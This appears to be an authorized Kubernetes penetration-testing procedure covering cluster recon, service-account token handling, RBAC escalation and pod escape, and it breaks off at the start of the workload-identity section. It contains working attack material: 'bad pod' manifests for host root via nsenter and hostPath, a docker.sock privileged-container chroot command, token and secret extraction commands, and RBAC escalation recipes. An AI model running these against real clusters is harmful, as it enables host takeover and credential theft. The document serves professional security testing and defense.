Skip to main content
Synced from an Obsidian vault

For graph and advanced features, download the full Intel Codex Vault and open it in Obsidian.

Container & Kubernetes Pentesting SOP (Authorized)

Authorized environments only. Kubernetes pentesting touches three trust boundaries in one engagement: the cluster API plane (RBAC, service-account tokens, admission control), the workload-identity bridge (IRSA / GKE Workload Identity / AKS Pod Identity, which mints cloud-provider tokens), and the node host (a successful pod escape lands a process on a multi-tenant kernel). A single mis-scoped kubectl exec, RoleBinding write, or privileged: true pod rehearsal can cross all three. Authorization is per-cluster, per-namespace, and per-action-class (read-only enumeration, RBAC mutation, pod-escape detonation, workload-identity exercise) — get each in writing before any tool from §16 runs against an in-scope cluster.


Table of Contents


Pre-Engagement & Authorization

A Kubernetes engagement is not a Linux engagement with kubectl bolted on. The blast-radius geometry is different: a single kubectl exec can run in any pod the SA has rights to; a single subjects[].name edit on a ClusterRoleBinding grants cluster-admin to an attacker-controlled identity cluster-wide, not host-wide; a single privileged: true pod with hostPath: / is root-on-every-worker. The legal surface is also distinct — workload identity bindings (IRSA / Workload Identity / Pod Identity) federate to the cloud-provider tenant, so exercising them reaches another tenant's IAM plane and may require its separate authorization (see Legal & Ethics for the canonical framework). CSP-bundled managed-k8s (EKS / AKS / GKE) has its own pentesting policy carve-outs that change per-CSP and per-year [verify 2026-04-27].

Authorization Checklist

  • Signed Rules of Engagement enumerates clusters by name + cloud-provider region + control-plane endpoint. "The Kubernetes environment" without a per-cluster list is too vague — collect cluster names, control-plane CA SHA-256 fingerprints, and the apiserver URL of every in-scope cluster.
  • Namespace scope is explicit. Most organizations multi-tenant by namespace; an unscoped engagement reaches every team's workload. Either name in-scope namespaces or document the cluster-wide rationale.
  • Action-class scope is explicit. Read-only kubectl get / describe / auth can-i is one bucket. RBAC mutation (kubectl create rolebinding, clusterrolebinding, apply -f), pod creation, kubectl exec, kubectl port-forward, kubectl debug --image, and kubectl proxy are each different blast-radius classes — name each in/out.
  • kubectl exec and kubectl debug --image scope. Exec into a pod runs commands as that pod's identity in that pod's namespace. kubectl debug --image injects an ephemeral container or copies a target pod with a debug image — both write the cluster state and both can persist if the engagement window is exceeded. Default: out-of-scope; named-target exception only.
  • Pod-escape detonation scope. privileged: true, hostPID: true, hostNetwork: true, hostPath mounts to /, capability adds (SYS_ADMIN, SYS_PTRACE, SYS_MODULE), runc/containerd Leaky-Vessels-class CVE rehearsals (CVE-2024-21626 [verify 2026-04-27]) cross the pod→host boundary. Out-of-scope by default; per-CVE, per-cluster, per-node-pool authorization required.
  • Admission-controller-bypass scope. Bypassing Pod Security Standards restricted or admission policy (Gatekeeper / Kyverno / jsPolicy) to land an out-of-policy pod is itself a finding worth reporting; exercising the bypass for further escalation requires named authorization.
  • Workload-identity / cloud-bridge exercise scope. When an in-scope SA is bound to IRSA / GKE Workload Identity / AKS Pod Identity, exercising the binding mints a cloud-provider token and reaches the cloud-provider IAM plane — that traversal requires the cloud tenant's separate authorization (see Cloud Pentesting for the cloud-side authorization checklist).
  • etcd / control-plane direct access. Self-managed clusters expose etcd on TCP/2379. Self-hosted control planes may also expose unauthenticated kubelet on 10250 / read-only port 10255 (deprecated, removed 1.16+ [verify 2026-04-27]). Direct etcd access is full cluster admin via raw key-value reads — out of scope by default, named-target exception only.
  • Tenant boundary in shared clusters. Multi-tenant SaaS clusters (vCluster, kcp, namespace-as-a-service) and multi-team clusters share the apiserver. Tenant-A's pentest must not query Tenant-B's namespaces; kubectl auth can-i --namespace <other-tenant> itself is informational but listing or describing other-tenant Pods/Secrets is a scope violation.
  • Image registry scope. Registry credentials harvested from an in-scope cluster reach the registry's tenant — registry actions (image push, tag overwrite, repository delete) require the registry owner's authorization, which is often not the cluster owner.
  • CI/CD pipeline scope. ArgoCD / Flux / Tekton / Jenkins X access from inside the cluster lets a cluster-admin push to in-cluster Git mirrors and trigger pipelines. Pipeline-execution scope is separate from cluster-execution scope.
  • Blue-team coordination confirmed with whoever runs Falco / Tetragon / GuardDuty EKS Audit Log monitoring / Defender for Containers / GKE Security Posture, the SIEM, and the SOC bridge. Capture 24/7 contacts and emergency-stop signal — k8s-audit-driven detections fire at high rate during enumeration runs.
  • Recovery preconditions. GitOps reconciliation in place (ArgoCD / Flux) so any test mutation that escapes cleanup gets re-reconciled to declared state. If GitOps is not in place, the rollback runbook and a tested cluster-state backup (Velero / etcd snapshot) are prerequisites.
  • Per-CSP penetration-testing policy reviewed. AWS, Azure, and GCP each publish managed-k8s pentesting guidance separate from generic cloud pentesting policy [verify 2026-04-27]. Re-read at the start of each engagement; some primitives (control-plane DDoS, kube-apiserver-targeted scanning rate) remain prohibited regardless of customer authorization.

Lab Environment Requirements

  • Standalone lab cluster per engagement. Never rehearse RBAC mutation, pod-escape PoCs, or admission-controller-bypass primitives against the customer's cluster. kind, minikube, k3d, or a dedicated EKS/AKS/GKE cluster in the engagement operator's lab account is the minimum. Free-tier lab options exist for all three managed offerings [verify 2026-04-27].
  • Lab parity with target. Match the customer cluster's k8s minor version (kubectl version --output=json), CRI runtime (Docker shim — removed 1.24+, containerd, CRI-O), CNI (Cilium, Calico, Weave Net, AWS VPC CNI, Azure CNI, Cilium-EKS, GKE Dataplane V2), and admission-controller stack (PSA mode + namespace-pinned Pod Security Standards label, Gatekeeper / Kyverno policy bundle, validating-/mutating-webhook chain). Pod-escape primitives gated by capability set, runtime version, or kernel feature behave differently on near-miss configurations.
  • Container runtime version-matched for runc / containerd / CRI-O CVE rehearsals. Docker bundles runc; containerd bundles its own; CRI-O bundles its own — the patched-baseline triple at the time of the engagement is what to match. Leaky Vessels (CVE-2024-21626) baseline: runc ≥ 1.1.12, containerd ≥ 1.7.13, Docker Engine ≥ 25.0.2 [verify 2026-04-27].
  • PoC vetting workflow. Public k8s exploit code (KubeStriker, Bad Pods recipes, peirates payloads, runc-escape PoCs) on production is out-of-scope by default. Reproduce in the lab cluster, verify the primitive works, then narrate the equivalent finding from the target cluster's configuration without running the binary against production. Public PoCs have been backdoored — sha256sum and inspect before any execution.
  • Sacrificial cluster-admin kubeconfig. Engagement operator's daily-driver kubeconfig is not the credential used for testing; per-engagement service-account or kubeconfig minted at engagement start, scoped to in-scope clusters/namespaces, rotated at engagement close.
  • GTFOBins-style coverage spot-check. Before reporting a SA-token / RBAC verb / capability finding as exploitable, verify the primitive on Bad Pods (Bishop Fox) and HackTricks Kubernetes [verify 2026-04-27] — many baseline pod specs look exploitable but lack a documented escalation gadget under the cluster's specific Pod Security Standards / admission policy.

Disclosure-Ready Posture

Stand up the evidence pipeline before the first kubectl auth can-i --list call, not after the report deadline. The k8s-specific evidence surface is wider than classic Linux pentesting: every command leaves an apiserver audit-log entry, every pod creation leaves a node-runtime trace, every ServiceAccount token use leaves a cloud-provider audit trail (when bound to IRSA / Workload Identity / Pod Identity).

  • Capture every kubectl call. kubectl --v=8 logs the full HTTP request/response with apiserver; kubectl proxy + recording proxy logs provides the same. Archive the apiserver audit-event ID for each test action so the customer can correlate via their audit-log destination (CloudWatch Logs for EKS, Log Analytics for AKS, Cloud Logging for GKE).
  • RBAC dump baseline at engagement start. kubectl get clusterrole,clusterrolebinding,role,rolebinding -A -o yaml > rbac.baseline.yaml plus kubectl get sa -A -o yaml > sa.baseline.yaml. Any RBAC change made during testing is the diff against this baseline.
  • Audit-policy snapshot. kubectl get --raw /api/v1/namespaces/kube-system/configmaps/audit-policy 2>/dev/null (where readable) or vendor-managed audit policy reference. Records what the cluster was logging when you tested — critical when the customer later reviews coverage gaps.
  • Cluster version + CRI + CNI + admission-controller fingerprint. kubectl version --output=json, kubectl get nodes -o wide (CRI runtime in STATUS), kubectl get pods -n kube-system -l <CNI-label>, kubectl get validatingwebhookconfigurations,mutatingwebhookconfigurations -A — the fingerprint at the time of the test, frozen with the report.
  • Token & kubeconfig hygiene. Service-account tokens harvested during testing (especially long-lived legacy SA tokens — pre-1.24 default — and IRSA / Workload-Identity-bound projected tokens) hold replayable cluster identity. Encrypt-at-rest, scope retention to the report-delivery window, log who accessed them, schedule destruction in the engagement letter — discipline per OPSEC.
  • Evidence pack + final report routing. Stage evidence per the Collection Log hash-and-timestamp pattern referenced in §14 below; final disclosure pack follows Reporting & Disclosure. Defang any IOC that ships in the final write-up (redact cluster names, account IDs, namespace names to the minimum needed for the customer to identify the affected resources).

1. Engagement Setup

Pre-Engagement

  • Define scope: clusters (by name + endpoint + cloud-provider region), namespaces, action classes (read-only / RBAC-mutate / pod-escape / WI-exercise), in/out CRDs (Operators publish their own CRDs — some are sensitive)
  • Obtain written authorization (RoE) per the checklist above
  • Identify CSP support plan and managed-k8s pentesting policy carve-outs
  • Establish testing windows and emergency-stop signal
  • Set up logged-shell jump host with kubectl, kubectl-cnpg, kubectl-krew, helm, evidence bucket, NTP-synced clock
  • Confirm cost ceiling — peirates / kube-hunter / kubeaudit at default verbosity generate apiserver request volume that can hit etcd-call-rate limits on shared control planes

Objectives (Examples)

  • Identify cluster-admin paths from a low-privilege ServiceAccount or compromised pod
  • Discover pods escapable to host (privileged, hostPath /, hostPID, dangerous capabilities)
  • Test admission-controller coverage (Pod Security Standards, Gatekeeper, Kyverno) for bypass
  • Validate workload-identity boundary (IRSA / GKE WI / AKS Pod Identity) — does a compromised pod's SA reach more cloud-provider IAM than the workload requires?
  • Test detection coverage (apiserver audit → SIEM, Falco / Tetragon, GuardDuty EKS Audit Log, Defender for Containers)
  • Identify supply-chain exposure (registry credentials in cluster, signed-image enforcement, ArgoCD/Flux pipeline access)
  • Validate compliance posture (CIS Kubernetes Benchmark, NSA/CISA Kubernetes Hardening Guide, Pod Security Standards)

2. Cluster Reconnaissance

The recon goal is fingerprint, not enumeration: the apiserver tells you everything if you have a token, but the cluster's shape (version, CNI, CRI, admission stack, audit posture) determines which downstream primitives are feasible.

Cluster fingerprint (authenticated)

# Apiserver + control-plane fingerprint
kubectl version --output=json # client + server version
kubectl cluster-info # apiserver URL, KubeDNS / CoreDNS
kubectl cluster-info dump --output-directory ./recon # broad, noisy — use with caution
kubectl api-resources # full resource list (incl. CRDs)
kubectl api-versions # API group versions exposed
kubectl get --raw /version | jq # raw server-version handshake
kubectl get --raw /metrics 2>/dev/null | head # apiserver Prometheus metrics (often unauth on self-hosted)

# Node + runtime fingerprint
kubectl get nodes -o wide # OS image, kernel, CRI runtime
kubectl get nodes -o jsonpath='{.items[*].status.nodeInfo}' | jq
# Look for: kubeletVersion, containerRuntimeVersion (containerd://1.7.x, docker://20.10.x), kernelVersion

# Namespace inventory
kubectl get namespaces
kubectl get namespaces -o jsonpath='{.items[*].metadata.labels}' # PSA labels: pod-security.kubernetes.io/{enforce,audit,warn}={privileged,baseline,restricted}

# CNI fingerprint
kubectl get pods -n kube-system -o wide
# Look for: cilium-*, calico-node-*, weave-net-*, aws-node-* (VPC CNI), azure-cni-*, kindnet-*

# Admission stack
kubectl get validatingwebhookconfigurations -o name
kubectl get mutatingwebhookconfigurations -o name
kubectl get validatingadmissionpolicies,validatingadmissionpolicybindings 2>/dev/null # 1.30+ GA [verify 2026-04-27]
kubectl get crd | grep -iE "gatekeeper|opa|kyverno|jspolicy|kubewarden"

Cluster fingerprint (unauthenticated / external)

# Apiserver TLS fingerprint (no credentials)
echo | openssl s_client -connect <apiserver>:6443 -showcerts 2>/dev/null | openssl x509 -noout -text | grep -E "Subject:|DNS:|Not (Before|After)"

# Anonymous-auth check (pre-1.24 default; explicitly disabled in most managed offerings — verify per cluster)
curl -sk https://<apiserver>:6443/version
curl -sk https://<apiserver>:6443/api/v1/namespaces/default/pods
# 401 = anonymous disabled (expected). 200 with a pod list = anonymous-auth enabled = critical.

# Discoverable endpoints on common ports
# 6443 — apiserver TLS (managed offerings)
# 8443 — apiserver TLS (self-hosted alt)
# 10250 — kubelet TLS (per-node)
# 10255 — kubelet read-only HTTP (deprecated, removed 1.16+) [verify 2026-04-27]
# 2379-2380 — etcd (self-hosted only; managed offerings hide etcd)
# 4194 — cAdvisor (deprecated)

# kube-hunter — passive / active discovery
# https://github.com/aquasecurity/kube-hunter
kube-hunter --remote <apiserver-cidr-or-ip>
kube-hunter --cidr <network> --active # active mode — destructive; lab only

Pod-internal recon (post-compromise: shell on a pod)

# "Am I in a Kubernetes pod?"
ls /var/run/secrets/kubernetes.io/serviceaccount/ # SA token, ca.crt, namespace
env | grep -E "KUBERNETES_(SERVICE|PORT)" # apiserver Service env vars
cat /etc/resolv.conf # search domain: <ns>.svc.cluster.local

# Pod identity
SA=/var/run/secrets/kubernetes.io/serviceaccount
cat $SA/namespace
cat $SA/ca.crt | openssl x509 -noout -subject -issuer
TOKEN=$(cat $SA/token)
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/$(cat $SA/namespace)/pods | jq

# Host indicators leaking through pod
mount | grep -E "overlay|kubelet|var/lib/kubelet"
cat /proc/1/cgroup | grep -E "kubepods|containerd|crio"
ls -la /sys/fs/cgroup/ # cgroup v1 vs v2 (host kernel feature)

T1613 (Container and Resource Discovery), T1526 (Cloud Service Discovery — when WI binding traverses to cloud).


3. Authentication & Identity

Kubernetes authenticates to the apiserver via one of: client certificates (most self-hosted clusters), bearer tokens (ServiceAccount projected tokens, OIDC ID tokens), basic auth (deprecated, removed 1.19+ [verify 2026-04-27]), or webhook token authentication (cloud-provider IAM federations: AWS IAM Authenticator → EKS, Azure AD → AKS, GCP IAM → GKE).

ServiceAccount tokens

# Pre-1.24 default: long-lived JWT in /var/run/secrets/kubernetes.io/serviceaccount/token
# 1.24+ default: BoundServiceAccountTokenVolume — projected, time-bound (1h default), audience-scoped
# https://kubernetes.io/docs/concepts/security/service-accounts/#bound-service-account-tokens

# Decode the JWT to inspect claims
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq
# Look for: iss (apiserver URL), aud (audience — sts.amazonaws.com / api / specific webhook),
# exp (expiry), kubernetes.io.serviceaccount.name, kubernetes.io.serviceaccount.uid

# Mint a fresh token for a target SA (caller must have create on serviceaccounts/token sub-resource)
kubectl create token <sa-name> -n <namespace> --duration=1h
kubectl create token <sa-name> -n <namespace> --audience=sts.amazonaws.com # IRSA-bound

# Legacy long-lived SA secrets (Secret of type kubernetes.io/service-account-token)
kubectl get secrets -n <ns> --field-selector=type=kubernetes.io/service-account-token
kubectl get secret <secret-name> -n <ns> -o jsonpath='{.data.token}' | base64 -d

T1552.007 (Container API), T1528 (Steal Application Access Token).

kubeconfig analysis

# Find loose kubeconfigs (post-host-compromise)
find / -name "config" -path "*/.kube/*" 2>/dev/null
find / -name "kubeconfig*" 2>/dev/null

# Inspect contexts, users, exec credentials
kubectl config view --raw # includes embedded creds
kubectl config get-contexts
kubectl config view --raw -o jsonpath='{.users[*].user.exec}' | jq
# exec.command often invokes aws-iam-authenticator, gke-gcloud-auth-plugin, kubelogin, etc.
# Embedded client certs / tokens are rotation-fragile but often missed in IR

OIDC / cloud IAM federation

# EKS — IAM authenticator (mapping IAM principals to k8s users via aws-auth ConfigMap)
kubectl get cm aws-auth -n kube-system -o yaml # critical — controls who is cluster-admin
# IRSA — IAM Roles for Service Accounts; SA annotation eks.amazonaws.com/role-arn binds the SA
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.eks\.amazonaws\.com/role-arn)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.eks\.amazonaws\.com/role-arn}{"\n"}{end}'

# AKS — Azure AD integration; pod-managed identity / Workload Identity (WI replaces aad-pod-identity, deprecated)
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.azure\.workload\.identity/client-id)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.azure\.workload\.identity/client-id}{"\n"}{end}'

# GKE — Google IAM federation; Workload Identity binds k8s SA to GCP SA
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.iam\.gke\.io/gcp-service-account)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.iam\.gke\.io/gcp-service-account}{"\n"}{end}'

§7 covers the exercise of the workload-identity binding (mint a cloud token from a compromised pod). This section enumerates only.


4. RBAC Enumeration & Abuse

RBAC is the cluster's authorization plane. The apiserver answers "may principal P do verb V on resource R in namespace N?" against the union of bound (Cluster)Roles. Most exploitable misconfigurations live here.

kubectl auth can-i mining

# Full permission matrix for current credential
kubectl auth can-i --list # current namespace
kubectl auth can-i --list --all-namespaces # cluster-scope view (1.27+ for namespace=*) [verify 2026-04-27]
kubectl auth can-i --list --as=system:anonymous # anonymous-auth surface
kubectl auth can-i --list --as=system:serviceaccount:<ns>:<sa> # impersonation check (requires impersonate verb)

# Specific verbs that lead to escalation
kubectl auth can-i create pods --all-namespaces
kubectl auth can-i create pods/exec --all-namespaces
kubectl auth can-i create pods/portforward --all-namespaces
kubectl auth can-i create clusterrolebindings
kubectl auth can-i patch nodes
kubectl auth can-i create token --subresource=token serviceaccounts/<target-sa>
kubectl auth can-i impersonate users
kubectl auth can-i '*' '*' --all-namespaces # cluster-admin? (literal '*' — quote against shell glob)

RBAC graph dump

# Full RBAC surface — start with a baseline before any mutation
kubectl get clusterroles -o yaml > clusterroles.baseline.yaml
kubectl get clusterrolebindings -o yaml > clusterrolebindings.baseline.yaml
kubectl get roles -A -o yaml > roles.baseline.yaml
kubectl get rolebindings -A -o yaml > rolebindings.baseline.yaml
kubectl get sa -A -o yaml > sa.baseline.yaml

# KubiScan — RBAC risk scanner (Cyberark)
# https://github.com/cyberark/KubiScan
kubiscan --risky-roles
kubiscan --risky-subjects
kubiscan --risky-pods

# rbac-tool (Insight Engineering) — RBAC analysis + visualization
# https://github.com/alcideio/rbac-tool
rbac-tool who-can create clusterrolebindings
rbac-tool who-can '*' '*'
rbac-tool viz --cluster-context <ctx> # generate dot graph

# rbac-lookup (FairwindsOps)
# https://github.com/FairwindsOps/rbac-lookup
rbac-lookup <name> --output wide
rbac-lookup --kind serviceaccount

# Stale ClusterRoleBindings to default SAs
kubectl get clusterrolebindings -o jsonpath='{range .items[?(@.subjects[*].kind=="ServiceAccount")]}{.metadata.name}: {range .subjects[*]}{.namespace}/{.name} {end}{"\n"}{end}'

Canonical RBAC escalation primitives

The most-cited RBAC privilege-escalation path catalog is Bishop Fox's "Bad Pods" + Mark Manning / Brad Geesaman's k8s-attack-research. Categories that actually escalate (verify each against the cluster's admission policy):

  • create pods/exec on a high-privileged pod's namespace — exec into a pod whose SA has more rights, then act as that SA. Often holds for pods running ArgoCD, Flux, Tekton, monitoring exporters, GitOps controllers, ingress controllers.
  • create pods + create serviceaccounts/token (or pre-existing privileged SA available to bind) — schedule a new pod that mounts a privileged SA token, exec into it.
  • patch pods/ephemeralcontainers (1.25+ GA [verify 2026-04-27]) — inject a debug container into a target pod without needing exec; the container shares the pod's SA token and namespace.
  • create pods with serviceAccountName: <privileged-SA-in-same-namespace> — escalate to any SA in the same namespace, not just your own.
  • escalate verb on roles/clusterroles (rbac.authorization.k8s.io/v1) — bypasses the rule that forbids creating a Role with permissions you don't have. With escalate you can create a Role/CR that grants anything, then bind it to yourself.
  • bind verb on roles/clusterroles — bind an existing high-privilege Role/CR to yourself or a controlled SA without needing the underlying permissions.
  • create rolebindings / create clusterrolebindings without bind — most common; if you can bind any existing cluster-admin-equivalent ClusterRole (cluster-admin, system:masters, edit, admin) to yourself or your SA, you escalate.
  • update users via aws-auth ConfigMap (EKS)kubectl edit cm aws-auth -n kube-system with update configmaps in kube-system lets the attacker map any AWS IAM principal to system:masters (cluster-admin equivalent on EKS) [verify 2026-04-27].
  • patch nodes — node lease takeover; can poison node labels / taints to attract privileged workloads to a controlled node.
  • get secrets cluster-wide — read every Secret, including SA tokens (legacy long-lived) and cloud-provider credentials baked in (KMS keys are sometimes referenced by ARN/URI in Secret annotations even when the keymat itself is not in the Secret).
  • impersonate users / groups / serviceaccounts — direct apiserver impersonation (verb impersonate) lets the attacker act as any principal; cluster-admin-equivalent.
# Quick check of the escalation surface from current credential
for verb in 'create pods/exec' 'create clusterrolebindings' 'escalate clusterroles' 'bind clusterroles' \
'create pods/ephemeralcontainers' 'impersonate users' 'patch nodes' 'get secrets'; do
res=$(kubectl auth can-i $verb --all-namespaces 2>/dev/null)
echo "$verb$res"
done

T1098.006 (Account Manipulation: Additional Container Cluster Roles), T1078.004 (Valid Accounts: Cloud Accounts).

Default-SA over-permission

Every namespace has a default ServiceAccount. Any pod that does not specify serviceAccountName: mounts the default SA's token. If the default SA has cluster-admin (a frequent legacy holdover from Helm charts that bound cluster-admin to default), every pod in that namespace is cluster-admin.

# Find ClusterRoleBindings that grant non-trivial roles to default SAs
kubectl get clusterrolebindings -o json \
| jq '.items[] | select(.subjects[]? | select(.kind=="ServiceAccount" and .name=="default")) | {name: .metadata.name, role: .roleRef.name, subjects: .subjects}'

# Per-namespace default-SA token review
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
rights=$(kubectl auth can-i --list --as=system:serviceaccount:$ns:default 2>/dev/null | grep -cE 'create|delete|update|patch|\*')
[ $rights -gt 5 ] && echo "$ns: default SA has $rights mutating verbs"
done

5. Pod Escape Primitives

Pod-escape primitives cross the pod→host boundary. They are the Kubernetes equivalent of kernel LPE: a successful escape lands a process on the worker node, then on every other workload colocated on that node. Most modern managed offerings (EKS, AKS, GKE) ship with sensible defaults (Pod Security Standards baseline or restricted on system namespaces, runc patched against Leaky Vessels, AppArmor / seccomp profiles), but customer-namespaces often relax the constraints.

Detonation discipline. Each primitive in this section assumes the customer's RoE explicitly authorizes pod-escape detonation against a named cluster + node pool. Default behavior is to demonstrate the configuration that would allow escape (a pod manifest, a capability set, a RBAC grant) and stop. Detonation requires named per-primitive authorization.

Privileged pod / hostPID / hostNetwork / hostPath

The classic escape path. Eight canonical "bad pod" recipes from Bishop Fox map combinations of these flags to escape primitives [verify 2026-04-27].

# Recipe 1: privileged: true + hostPID + hostPath / → root on host via nsenter
apiVersion: v1
kind: Pod
metadata: { name: bad-pod-1, namespace: <ns> }
spec:
hostPID: true
containers:
- name: bp
image: alpine
securityContext: { privileged: true }
command: ["nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash"]

# Recipe 2: hostPath: / → read every file on the node (kubeconfig, etcd certs, kubelet creds)
apiVersion: v1
kind: Pod
metadata: { name: bad-pod-2 }
spec:
containers:
- name: bp
image: alpine
volumeMounts: [{ name: host, mountPath: /host }]
volumes: [{ name: host, hostPath: { path: / } }]
# Find existing pods with escape-class flags (no detonation — enumeration)
kubectl get pods -A -o json | jq -r '.items[]
| select(.spec.hostPID==true or .spec.hostNetwork==true or .spec.hostIPC==true
or (.spec.containers[]?.securityContext.privileged==true)
or (.spec.volumes[]?.hostPath != null))
| "\(.metadata.namespace)/\(.metadata.name): " +
"hostPID=\(.spec.hostPID // false) hostNet=\(.spec.hostNetwork // false) " +
"priv=\([.spec.containers[]?.securityContext.privileged] | tostring)"'

# Find existing pods with hostPath mounts to sensitive paths
kubectl get pods -A -o json | jq -r '.items[] | select(.spec.volumes[]?.hostPath.path | tostring | test("^(/|/etc|/var/run/docker.sock|/var/lib/kubelet|/proc|/sys)$"))'

Capabilities

Linux capabilities held by the container process. CAP_SYS_ADMIN + writable cgroup v1 = release_agent escape (CVE-2022-0492 [verify 2026-04-27]); CAP_SYS_PTRACE + hostPID = attach to host PID 1; CAP_SYS_MODULE = load kernel modules; CAP_NET_ADMIN + hostNetwork = manipulate host network stack.

# Find pods with dangerous capability adds
kubectl get pods -A -o json | jq -r '.items[] | .spec.containers[]? | select(.securityContext.capabilities.add != null) | {pod: .name, adds: .securityContext.capabilities.add}'

# In-pod capability check (post-compromise)
capsh --print | grep -E "cap_sys_(admin|ptrace|module)|cap_dac_(read_search|override)|cap_net_(admin|raw)"
grep ^Cap /proc/self/status
capsh --decode=$(awk '/^CapEff/{print $2}' /proc/self/status)

Mounted Docker / containerd / CRI-O socket

A pod with /var/run/docker.sock, /run/containerd/containerd.sock, or /var/run/crio/crio.sock mounted has direct control of the node's container runtime. Equivalent to root-on-host: launch a new container with --privileged + host root mounted.

# Find pods mounting runtime sockets
kubectl get pods -A -o json | jq -r '.items[] | .spec.volumes[]? | select(.hostPath.path | tostring | test("docker.sock|containerd.sock|crio.sock|podman.sock"))'

# Inside a pod with docker.sock — confirm
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock ps
docker -H unix:///var/run/docker.sock run --rm --privileged -v /:/host alpine chroot /host /bin/bash

Container-runtime CVE rehearsals

Lab-only. Each primitive below has crashed clusters in the wild during pentests. Match runtime version exactly in the lab before reporting feasibility against production from configuration alone.

CVEComponentTriggerQuick check
CVE-2024-21626 (Leaky Vessels)runc ≤ 1.1.11FD leak through /proc/self/fd to host filesystemrunc --version on node; docker info --format '{{.RuncVersion}}'
CVE-2022-0492Linux kernel cgroup v1release_agent write from CAP_SYS_ADMIN-holding containerunprivileged user namespace + cgroup v1 on host kernel
CVE-2022-0185Linux kernel fs_contextHeap overflow exploitable in containers with CAP_SYS_ADMINuname -r ≤ 5.16.x [verify 2026-04-27]
CVE-2019-5736runc ≤ 1.0-rc6Overwrite host's runc binary by overwriting /proc/self/exeLegacy clusters only
CVE-2022-23648containerd OCI image-specSymlink traversal during image extractioncontainerd ≤ 1.6.1
CVE-2024-0132 (NVIDIA Container Toolkit)NVIDIA Container Toolkit ≤ 1.16.1TOCTOU mount-handling escapeNVIDIA-GPU clusters only [verify 2026-04-27]

[verify 2026-04-27] Patched-baseline versions drift; cross-check vendor advisories at engagement start.

T1611 (Escape to Host).


6. Admission-Controller Bypass

Admission controllers gate every write to the apiserver. They are the cluster's last line of defense before pods land on nodes. Two classes:

  • Built-in admission plugins — Pod Security Standards (PSS, replaces deprecated PodSecurityPolicy [verify 2026-04-27]), NodeRestriction, ResourceQuota, LimitRanger, AlwaysPullImages, ImagePolicyWebhook.
  • Custom admission webhooks — Validating (reject-only) and Mutating (rewrite) webhook chains. OPA Gatekeeper, Kyverno, jsPolicy, Kubewarden are the dominant policy engines; vendor-specific webhooks (Istio sidecar injection, Linkerd injection, cert-manager injection) frequently exist.
  • ValidatingAdmissionPolicy (CEL-based, GA in 1.30 [verify 2026-04-27]) — in-tree alternative to validating webhooks, no external service required.

Pod Security Standards (PSS)

# Per-namespace PSS labels (enforce | audit | warn at privileged | baseline | restricted)
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/audit}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/warn}{"\n"}{end}'

# Bypass surfaces:
# 1. Namespace has no PSS label → defaults to "privileged" (no restrictions)
# 2. PSS "warn" or "audit" without "enforce" → logs but does not block
# 3. PSA admission plugin disabled in apiserver config (self-hosted only)

Webhook ordering & failurePolicy

The apiserver calls validating webhooks in arbitrary order; mutating webhooks in declared order. Each webhook has a failurePolicy (Ignore or Fail) and timeoutSeconds. A webhook with failurePolicy: Ignore that times out is effectively bypassed.

# Webhook configurations (look for failurePolicy: Ignore on security-critical webhooks)
kubectl get validatingwebhookconfigurations -o yaml | grep -A2 -E "name:|failurePolicy:|timeoutSeconds:|namespaceSelector:"

# namespaceSelector / objectSelector exemptions are common bypass primitives
# A webhook scoped to namespaceSelector: matchExpressions: [{key: kubernetes.io/metadata.name, operator: NotIn, values: [kube-system]}]
# means kube-system pods are *exempt* — adversary creates target pod in kube-system.

OPA Gatekeeper bypass

Gatekeeper compiles ConstraintTemplates into Rego policies enforced via a validating webhook. Common bypasses:

  • Constraint exemption listConfig resource's match.excludedNamespaces list. If kube-system is excluded (default in many bundles), creating a privileged pod in kube-system (assuming create pods rights there) bypasses Gatekeeper.
  • Constraint not bound to the resource — Gatekeeper enforces only the GVKs (Group-Version-Kind) listed in match.kinds. A constraint that lists Pod does not block Deployment (the Deployment controller creates the Pod, but if the Deployment's PodSpec is the offending content, the constraint never fires on Deployments).
  • Audit-only modeenforcementAction: dryrun or warn logs violations without blocking [verify 2026-04-27].
kubectl get config -n gatekeeper-system -o yaml      # exemption list, sync config
kubectl get constraints -A # all bound constraints
kubectl get constrainttemplates # available policy templates

Kyverno bypass

Kyverno is a CRD-native policy engine (no Rego). Common bypasses:

  • Policy validationFailureAction: audit — logs but does not block (default for some policy bundles).
  • Policy match.resources.namespaces does not list the target namespace.
  • failurePolicy: Ignore + force a webhook timeout.
kubectl get clusterpolicies                          # cluster-wide Kyverno policies
kubectl get policies -A # namespaced policies
kubectl get cpol -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.validationFailureAction}{"\n"}{end}'

T1556.005 (Modify Authentication Process: Reversible Encryption [adapted — Kubernetes admission tampering analog]), T1562 (Impair Defenses).


7. Workload Identity → Cloud Bridge

The single largest under-tested surface in modern k8s pentests. A pod's ServiceAccount, when bound to a cloud-provider IAM identity (IRSA / GKE Workload Identity / AKS Pod Identity / Workload Identity), mints cloud-provider tokens on demand — reaching the cloud-provider IAM plane from inside the cluster. A SA-token compromise becomes a cloud-credential compromise.

Authorization boundary. Exercising a workload-identity binding minted from an in-scope k8s SA reaches the cloud-provider tenant as the bound IAM principal. That tenant's authorization is required separately. Coordinate with the Cloud Pentesting engagement letter; if the cloud tenant is out of scope, the engagement stops at "the SA can mint a cloud token of role X" without exercising the token.

EKS — IRSA (IAM Roles for Service Accounts)

The pod's projected SA token is signed by the cluster's OIDC issuer. The IAM role's trust policy trusts that OIDC issuer + SA subject. AWS STS AssumeRoleWithWebIdentity exchanges the SA token for AWS credentials.

# Identify IRSA bindings cluster-wide
